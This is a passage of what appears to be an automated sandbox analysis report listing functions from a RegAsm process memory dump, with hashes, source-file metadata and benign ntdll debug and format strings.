                                                    • Instruction Fuzzy Hash: 059002B1201540A25900B258C404B0B450587E1281B55C016E2058560CC52589519139
                                                    Function 02F82BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3272636d959325f9f644511e413168e55cf5b8fbce7ad751a1c8f8e41d275b2d
                                                    • Instruction ID: 44898e1f1adc202484a15d93ccd9e719a474300d2c11ceb8e44aff20f52da5a0
                                                    • Opcode Fuzzy Hash: 3272636d959325f9f644511e413168e55cf5b8fbce7ad751a1c8f8e41d275b2d
                                                    • Instruction Fuzzy Hash: BA90023120140812E5807158840464B000587D2381F95C015A1029654DCA158B5977A5
                                                    Function 02F82BE0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3587482c24d8072b20d80e130ae3943af7d081cadd1697eab0d98ab269859a5
                                                    • Instruction ID: 3acc94356edba329241543727fd7807293d8817e47576bc405cee0f625dd1ba8
                                                    • Opcode Fuzzy Hash: e3587482c24d8072b20d80e130ae3943af7d081cadd1697eab0d98ab269859a5
                                                    • Instruction Fuzzy Hash: CB90023120544852E54071588404A47001587D1385F55C011A1068694D96258E55B665
                                                    Function 02F82BA0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2ccfcd7a7c002884b7274bcf1d59cdf8e7cf9cedc3eba99d5fdec23d62a3f46
                                                    • Instruction ID: 06f7ae588054adb8dc9eb65a2a055222f3e3653085498755a8849242c36a9c9a
                                                    • Opcode Fuzzy Hash: b2ccfcd7a7c002884b7274bcf1d59cdf8e7cf9cedc3eba99d5fdec23d62a3f46
                                                    • Instruction Fuzzy Hash: A190023160540812E55071588414747000587D1381F55C011A1028654D87558B5576A5
                                                    Function 02F82B80 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4f2b7b6237ce435373fdf1dc7b7665593a8c80d98091a1e3b3f35d87095863c
                                                    • Instruction ID: 45da7c70fd2306090b3c381446342ace8e6f1d229a6f3e9acd10aeb3d7569b87
                                                    • Opcode Fuzzy Hash: a4f2b7b6237ce435373fdf1dc7b7665593a8c80d98091a1e3b3f35d87095863c
                                                    • Instruction Fuzzy Hash: AF90023120140812E50471588804687000587D1381F55C011A7028655E966589917135
                                                    Function 02F82B60 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 643a7a2927d1050dee63ab14f5f85b2e1730f92671de4b89fbd41481c4eeae11
                                                    • Instruction ID: f86c6fab4291730f5d929ca763b5e0dd8e48add195239c54d7b82c93fd11edde
                                                    • Opcode Fuzzy Hash: 643a7a2927d1050dee63ab14f5f85b2e1730f92671de4b89fbd41481c4eeae11
                                                    • Instruction Fuzzy Hash: 5D90027120240013550571588414617400A87E1281B55C021E2018590DC52589916129
                                                    Function 02F839B0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f32eda923189980b889a70f7238b57048bcccece9d1b1423dc8337886c4d6d52
                                                    • Instruction ID: 442e0bbd2a9bd7153e96e4fa749f54a922f86fb774f7ef52b3bcf2a97fe7f51c
                                                    • Opcode Fuzzy Hash: f32eda923189980b889a70f7238b57048bcccece9d1b1423dc8337886c4d6d52
                                                    • Instruction Fuzzy Hash: E390023124545112E550715C84046174005A7E1281F55C021A1818594D855589556225
                                                    Function 02F82EE0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 366c6cad31ea51e14b442339d9d9e8319f863bf7a66d54d77bbfe1aae5363718
                                                    • Instruction ID: 0aa2f765e263a0110eabd6b1849606e817ca1085594a3fb9688024f81f60a784
                                                    • Opcode Fuzzy Hash: 366c6cad31ea51e14b442339d9d9e8319f863bf7a66d54d77bbfe1aae5363718
                                                    • Instruction Fuzzy Hash: DA90027120180413E54075588804607000587D1382F55C011A3068555E8A298D516139
                                                    Function 02F82EA0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc243d66edb3c19ac99b1d5ef4e087986c3e19a232ce47ec16bf3cef799bb4e8
                                                    • Instruction ID: 40da3938efc2d007be0e9cefdade5ef7e56a8ea2196aff27156dd8ff41883957
                                                    • Opcode Fuzzy Hash: cc243d66edb3c19ac99b1d5ef4e087986c3e19a232ce47ec16bf3cef799bb4e8
                                                    • Instruction Fuzzy Hash: E290027120140412E54071588404747000587D1381F55C011A6068554E86598ED56669
                                                    Function 02F82E80 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d954f708b15abeea2ae550dae63e1b366ec2333930dc2ed401c363d1ab3a2559
                                                    • Instruction ID: f59d9e6d79a762adbab8e45ef420e026d9dc419045417d339923195a681e3d1a
                                                    • Opcode Fuzzy Hash: d954f708b15abeea2ae550dae63e1b366ec2333930dc2ed401c363d1ab3a2559
                                                    • Instruction Fuzzy Hash: C290023160140512E50171588404617000A87D12C1F95C022A2028555ECA258A92A135
                                                    Function 02F82E30 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 061e1e8465e55fbf45809c1b66705db9cd00f521085f776f80d94fc5281b0cbf
                                                    • Instruction ID: bd2c81cc08169df5e89bea89284e0a9c9c07077b66d2c45fc778e538886b7d60
                                                    • Opcode Fuzzy Hash: 061e1e8465e55fbf45809c1b66705db9cd00f521085f776f80d94fc5281b0cbf
                                                    • Instruction Fuzzy Hash: D390023130140412E502715884146070009C7D23C5F95C012E2428555D86258A53A136
                                                    Function 02F82FE0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f48d624b08e57685211ea6cd6246e89bb46abfc15c24dbf7a0b7b599a3a8a2fe
                                                    • Instruction ID: 69dfb6445e2308ff69676f1b133ee80b118551ae81692f59810ec92939851762
                                                    • Opcode Fuzzy Hash: f48d624b08e57685211ea6cd6246e89bb46abfc15c24dbf7a0b7b599a3a8a2fe
                                                    • Instruction Fuzzy Hash: 78900231211C0052E60075688C14B07000587D1383F55C115A1158554CC91589615525
                                                    Function 02F82FB0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9791aa0262c8795fe9a5d37e3c6d3beca9c0818b528f250e56b68cc1dd22c813
                                                    • Instruction ID: 41a13684b65a71b9aace033068af485bccaeaec70ffd3854921ffcc6908ab60c
                                                    • Opcode Fuzzy Hash: 9791aa0262c8795fe9a5d37e3c6d3beca9c0818b528f250e56b68cc1dd22c813
                                                    • Instruction Fuzzy Hash: 019002316014005255407168C8449074005ABE2291755C121A199C550D855989655669
                                                    Function 02F82FA0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b0256ba34e892f2a20ce501f06196e4e5b819c53b52c235b0a2441d8f771938
                                                    • Instruction ID: 633748e202978cff38a427b891cadeb49cede3c90fcded905dc0aae54e92742d
                                                    • Opcode Fuzzy Hash: 5b0256ba34e892f2a20ce501f06196e4e5b819c53b52c235b0a2441d8f771938
                                                    • Instruction Fuzzy Hash: 1E90023120180412E50071588808747000587D1382F55C011A6168555E8665C9916535
                                                    Function 02F82F90 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8576113cf77c8d24388de39246b2a5b7a7f0d00b1821142256017011327e3281
                                                    • Instruction ID: ac97ccae506c4943372b70a7ab8623155a621675ca1e29a6fa1cf2b9a01f7d5d
                                                    • Opcode Fuzzy Hash: 8576113cf77c8d24388de39246b2a5b7a7f0d00b1821142256017011327e3281
                                                    • Instruction Fuzzy Hash: 3A90023120180412E5007158881470B000587D1382F55C011A2168555D862589516575
                                                    Function 02F82F60 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1281f21989409352f925d9471bf42472d17329f0bb856c8115be5129be13e9b1
                                                    • Instruction ID: 06d20ee812f83fa2380cbbcee0d97c457ab95e477cb61cfd9b2f15eafdbe58ff
                                                    • Opcode Fuzzy Hash: 1281f21989409352f925d9471bf42472d17329f0bb856c8115be5129be13e9b1
                                                    • Instruction Fuzzy Hash: D790027121140052E50471588404707004587E2281F55C012A3158554CC5298D615129
                                                    Function 02F82F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2186f2dce08e26e0f9a0444911015d8d2463294a4040136e474761f031b376f3
                                                    • Instruction ID: 9657f942fd320a1779c8d27c4b73f5771c4e579612ec69a4189f2694d649075f
                                                    • Opcode Fuzzy Hash: 2186f2dce08e26e0f9a0444911015d8d2463294a4040136e474761f031b376f3
                                                    • Instruction Fuzzy Hash: 4590027134140452E50071588414B070005C7E2381F55C015E2068554D8619CD52612A
                                                    Function 02F82CF0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 87c0f323e63ca71a22ef4d9f203ac4062e4ad8fe8c9e64523b86e96b4f7643c8
                                                    • Instruction ID: e7b060aeb0a934d471d6401f60ffd02bf4cc73599d1b07ae81752d2ff558fb5c
                                                    • Opcode Fuzzy Hash: 87c0f323e63ca71a22ef4d9f203ac4062e4ad8fe8c9e64523b86e96b4f7643c8
                                                    • Instruction Fuzzy Hash: E190043130140413F500715CD50C7070005C7D13C1F55D411F143C55CDD757CD517135
                                                    Function 02F82CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 859e61904b5e4ed27eed5d98bfc64a4624a608f8adf06ef48bd8de41de7aa4d1
                                                    • Instruction ID: 38562555e97a09d2954d79e3fd266c16f37ed3d86b53ca05fe8dd3227184f60c
                                                    • Opcode Fuzzy Hash: 859e61904b5e4ed27eed5d98bfc64a4624a608f8adf06ef48bd8de41de7aa4d1
                                                    • Instruction Fuzzy Hash: 3890023160540412E54071589418707001587D1281F55D011A1028554DC6598B5566A5
                                                    Function 02F82CA0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6497c1d9251fc69c2ec74d89e4723cca48d12c186b14a860d3702f3812336e9
                                                    • Instruction ID: 0aa73acc21ce200ff7247b0f0a8898ef661d371a9ca9ab0f3684a3597e5f7064
                                                    • Opcode Fuzzy Hash: d6497c1d9251fc69c2ec74d89e4723cca48d12c186b14a860d3702f3812336e9
                                                    • Instruction Fuzzy Hash: 7690023120140412E50075989408647000587E1381F55D011A6028555EC66589916135
                                                    Function 02F82C60 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0075c2032f0aa0ca3c60e7e5105885060902b2ee8db41f3fbbd21317d57b5de3
                                                    • Instruction ID: b7cc1469ebd6718681c2d5853e209aab2647b0e8496895f8231fd4803bfea851
                                                    • Opcode Fuzzy Hash: 0075c2032f0aa0ca3c60e7e5105885060902b2ee8db41f3fbbd21317d57b5de3
                                                    • Instruction Fuzzy Hash: ED90023120140852E50071588404B47000587E1381F55C016A1128654D8615C9517525
                                                    Function 02F82DD0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 75a676fa29ffb393331846423af217354c451d3fc21c53bdf8864f2c133c4b47
                                                    • Instruction ID: cf8a82584ea20095192d8dbb446d445271d23390086302f5a58a82f7eeb96cb8
                                                    • Opcode Fuzzy Hash: 75a676fa29ffb393331846423af217354c451d3fc21c53bdf8864f2c133c4b47
                                                    • Instruction Fuzzy Hash: 9E900231242441626945B1588404507400697E12C1795C012A2418950C85269956D625
                                                    Function 02F82DB0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c446704b805c88c8fb2ad0fd6484f6103cad14d6dad1f66baf5291777a3e9a7
                                                    • Instruction ID: cfd5e02fbd8cf06409b6c7ea2d90aa3d4dfad0e8c581e698b733fd56b82dbfe7
                                                    • Opcode Fuzzy Hash: 5c446704b805c88c8fb2ad0fd6484f6103cad14d6dad1f66baf5291777a3e9a7
                                                    • Instruction Fuzzy Hash: 7D90023124140412E54171588404607000997D12C1F95C012A1428554E86558B56AA65
                                                    Function 02F83D70 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c27f1b8d4cae0185bbad6ade5feb59e72029423c06517245fa1d42471014d4e
                                                    • Instruction ID: d696078bfab6376553872f01579de4612bfb3ce300abca4658ab68680a05efbc
                                                    • Opcode Fuzzy Hash: 7c27f1b8d4cae0185bbad6ade5feb59e72029423c06517245fa1d42471014d4e
                                                    • Instruction Fuzzy Hash: 9990023520140412E91071589804647004687D1381F55D411A1428558D865489A1A125
                                                    Function 02F82D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e125456d9f9c061bb35b25054a0880edcb75bad8fb4a1d15f6ebd5705d78f939
                                                    • Instruction ID: 05160477800016ea69983d1e37eb331c1f1ecc487d159a8ee14fa83699d1e997
                                                    • Opcode Fuzzy Hash: e125456d9f9c061bb35b25054a0880edcb75bad8fb4a1d15f6ebd5705d78f939
                                                    • Instruction Fuzzy Hash: 6690023130140013E540715894186074005D7E2381F55D011E1418554CD91589565226
                                                    Function 02F82D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24c107af05a89e0c8ba1ef72bde300c9cb871a159e8972e148679b026fb223e5
                                                    • Instruction ID: 83ad994df1d576fbcd889b4595168b13d055329363f72550c2c0aafc0b53e923
                                                    • Opcode Fuzzy Hash: 24c107af05a89e0c8ba1ef72bde300c9cb871a159e8972e148679b026fb223e5
                                                    • Instruction Fuzzy Hash: 1790023921340012E5807158940860B000587D2282F95D415A1019558CC91589695325
                                                    Function 02F83D10 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dae81caba7c334f75a0a7c2e093ab6fa2c660a4577eba25b7e12072ac327c75f
                                                    • Instruction ID: 227f33284476862775686ae3e87232e44d517092870331a209c07f386ca28680
                                                    • Opcode Fuzzy Hash: dae81caba7c334f75a0a7c2e093ab6fa2c660a4577eba25b7e12072ac327c75f
                                                    • Instruction Fuzzy Hash: C990023120240152A94072589804A4F410587E2382B95D415A1019554CC91489615225
                                                    Function 02F82D00 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 500734601c02cba922f47e4d37ba295a5b428ad5a4b8bfd59afb6b50b2084582
                                                    • Instruction ID: 68cae3bb039826ffd036e21ff5d8065187e4dc8a6dc683ebf2175f9fecd595a6
                                                    • Opcode Fuzzy Hash: 500734601c02cba922f47e4d37ba295a5b428ad5a4b8bfd59afb6b50b2084582
                                                    • Instruction Fuzzy Hash: 1D90023120544452E50075589408A07000587D1285F55D011A2068595DC6358951A135
                                                    Function 02F82C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction ID: 856f2bc9522de7805cb0db0acf8ead29f5f2e83e8f1013eb368cee2efa203317
                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction Fuzzy Hash:
                                                    Function 02F82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: f3aece3a3bf36df1a25d4ac8cc42d9fe5cdccd000006fe95f75360aa8b239ebb
                                                    • Instruction ID: e9e363058da3d5bd884f12bbee245893d92d202c8f64728c6ffae722ec52897d
                                                    • Opcode Fuzzy Hash: f3aece3a3bf36df1a25d4ac8cc42d9fe5cdccd000006fe95f75360aa8b239ebb
                                                    • Instruction Fuzzy Hash: 8851E8B6F00156BFDF11EB99889097EF7B8BF082807508169EA65D7641D734EE50CBE0
                                                    Function 02F77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02FB4655
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02FB4725
                                                    • Execute=1, xrefs: 02FB4713
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02FB46FC
                                                    • ExecuteOptions, xrefs: 02FB46A0
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02FB4742
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 02FB4787
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: 6a8805f0113cc687f5732729ab5f8f6af8ab4c67c5a79fdbef78d61f7b06da82
                                                    • Instruction ID: ce0304fdc4108c4ad1296f23eace9bfac1bae1051653ece8575dd44306041683
                                                    • Opcode Fuzzy Hash: 6a8805f0113cc687f5732729ab5f8f6af8ab4c67c5a79fdbef78d61f7b06da82
                                                    • Instruction Fuzzy Hash: 2D512631A1021DBAEF11BAA4DC95FEAF7B9EF04384F1400AAD705A7181EB71AE45CF54
                                                    Function 02F8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction ID: 884e13bed912ca0278d54c787fe877dbe4d9454e2441ab52c7c6ee8b0c15bd94
                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction Fuzzy Hash: ED81B170E052499EDF24EE68C891BFEFBB2AF4539CF18425ADA61E72D0C7349841CB54
                                                    Function 02F6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 02FB031E
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02FB02BD
